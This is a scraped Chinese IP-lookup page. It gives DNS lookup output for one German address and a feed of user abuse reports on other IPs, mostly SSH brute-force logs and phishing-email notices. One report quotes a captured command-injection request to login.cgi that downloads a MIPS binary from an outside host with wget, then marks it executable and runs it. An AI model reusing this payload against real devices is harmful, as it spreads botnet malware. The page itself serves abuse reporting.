必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Germany

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 149.245.7.242
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62636
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;149.245.7.242.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022702 1800 900 604800 86400

;; Query time: 10 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 28 06:27:42 CST 2025
;; MSG SIZE  rcvd: 106
HOST信息:
Host 242.7.245.149.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 242.7.245.149.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
141.98.81.108 attackspam
2020-04-10T20:06:47.343986abusebot.cloudsearch.cf sshd[18718]: Invalid user admin from 141.98.81.108 port 39251
2020-04-10T20:06:47.350553abusebot.cloudsearch.cf sshd[18718]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=141.98.81.108
2020-04-10T20:06:47.343986abusebot.cloudsearch.cf sshd[18718]: Invalid user admin from 141.98.81.108 port 39251
2020-04-10T20:06:49.399997abusebot.cloudsearch.cf sshd[18718]: Failed password for invalid user admin from 141.98.81.108 port 39251 ssh2
2020-04-10T20:07:18.530863abusebot.cloudsearch.cf sshd[18804]: Invalid user admin from 141.98.81.108 port 42741
2020-04-10T20:07:18.536976abusebot.cloudsearch.cf sshd[18804]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=141.98.81.108
2020-04-10T20:07:18.530863abusebot.cloudsearch.cf sshd[18804]: Invalid user admin from 141.98.81.108 port 42741
2020-04-10T20:07:20.842311abusebot.cloudsearch.cf sshd[18804]: Failed password for in
...
2020-04-11 04:26:19
52.172.51.139 attackspam
SSH authentication failure x 6 reported by Fail2Ban
...
2020-04-11 04:15:03
104.248.87.160 attack
Apr 10 22:11:29 cvbnet sshd[23634]: Failed password for root from 104.248.87.160 port 42072 ssh2
...
2020-04-11 04:23:03
162.210.70.52 attack
Phishing mail send: We recently experience service disruption with our home bank on international transactions ever since the Convid 19 situation started affecting bank operation hours.
Please process payment to our below offshore Sweden bank account. Please confirm when payment will be expected and also share the transfer copy once processed for follow up.

Received: from us2-ob1-1.mailhostbox.com (162.210.70.52) by
 AM5EUR03FT041.mail.protection.outlook.com (10.152.17.186) with Microsoft SMTP
 Server (version=TLS1_0, cipher=TLS_RSA_WITH_AES_256_CBC_SHA) id 15.20.2856.17
 via Frontend Transport; Sat, 28 Mar 2020 14:21:49 +0000
2020-04-11 04:10:45
199.19.224.84 attackbots
$f2bV_matches
2020-04-11 04:22:22
159.89.170.251 attackbots
C2,WP GET /wp-login.php
2020-04-11 04:22:37
77.42.109.180 attackspam
/login.cgi%3Fcli=aa%20aa%27;wget%20http://45.14.224.22/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink%27$
2020-04-11 04:19:53
189.39.112.219 attackspambots
SSH Brute-Force attacks
2020-04-11 04:33:04
192.241.148.205 attackspambots
Invalid user git from 192.241.148.205 port 43276
2020-04-11 04:32:38
86.101.206.156 attackspambots
Apr 10 18:57:59 nginx sshd[58725]: Invalid user music from 86.101.206.156
Apr 10 18:57:59 nginx sshd[58725]: Connection closed by 86.101.206.156 port 50303 [preauth]
2020-04-11 04:12:33
112.169.152.105 attackspambots
2020-04-10T19:05:13.100983dmca.cloudsearch.cf sshd[28773]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.169.152.105  user=root
2020-04-10T19:05:14.694374dmca.cloudsearch.cf sshd[28773]: Failed password for root from 112.169.152.105 port 54524 ssh2
2020-04-10T19:08:34.448089dmca.cloudsearch.cf sshd[29097]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.169.152.105  user=root
2020-04-10T19:08:36.302378dmca.cloudsearch.cf sshd[29097]: Failed password for root from 112.169.152.105 port 52876 ssh2
2020-04-10T19:11:48.476923dmca.cloudsearch.cf sshd[29320]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.169.152.105  user=root
2020-04-10T19:11:50.296218dmca.cloudsearch.cf sshd[29320]: Failed password for root from 112.169.152.105 port 51228 ssh2
2020-04-10T19:15:09.908431dmca.cloudsearch.cf sshd[29678]: pam_unix(sshd:auth): authentication failure; logname= ui
...
2020-04-11 04:33:20
196.44.236.213 attackbotsspam
Apr 10 22:31:46 markkoudstaal sshd[24525]: Failed password for root from 196.44.236.213 port 34656 ssh2
Apr 10 22:36:52 markkoudstaal sshd[25235]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=196.44.236.213
Apr 10 22:36:54 markkoudstaal sshd[25235]: Failed password for invalid user user from 196.44.236.213 port 40606 ssh2
2020-04-11 04:37:56
179.98.109.188 attack
SSH invalid-user multiple login try
2020-04-11 04:21:30
82.196.15.195 attack
Brute-force attempt banned
2020-04-11 04:44:15
40.92.18.35 attackspam
Threaten email asking for money and claiming that having installed malware and keylogger
2020-04-11 04:39:50

最近上报的IP列表

242.24.3.55 96.8.205.54 255.109.171.22 80.5.42.251
177.233.44.140 59.145.228.42 130.209.246.129 133.255.146.189
226.214.239.251 7.137.229.214 232.34.204.232 143.75.64.168
215.233.182.237 37.192.38.93 28.110.115.1 38.86.125.60
160.162.76.62 73.126.166.0 200.181.171.168 113.43.232.50